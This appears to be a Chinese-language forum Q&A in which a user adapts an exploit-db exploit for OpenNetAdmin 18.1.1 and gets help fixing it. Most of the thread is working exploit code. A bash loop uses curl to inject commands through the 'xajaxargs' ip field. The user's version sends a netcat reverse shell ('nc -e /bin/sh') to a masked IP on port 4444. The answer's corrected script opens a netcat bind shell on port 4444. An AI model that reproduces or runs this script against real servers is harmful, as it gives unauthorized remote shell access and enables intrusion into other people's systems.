[我在OpenNetAdmin 18.1.1的exploit-db中找到了exploit
我必须调整此脚本,以便它对我有用,但我没有完成。这是我到目前为止的内容:
URL="xxx.xxx.xxx.xxx/ona"
while true;do
echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx 4444 "}; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
输出为:
{nc -e /bin/sh xxx.xxx.xxx.xxx 4444 }
我在语法上有点挣扎。
我做错了什么?
这就是您想要的,如果您只需要启动nc程序。该脚本假定远程计算机是Linux计算机,/ bin / bash和nc(netcat)使用-e support编译]
#!/bin/bash
URL="http://.../ona"
cmd="nc -l -p 4444 -e /bin/sh"
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
我找到了适合的解决方案: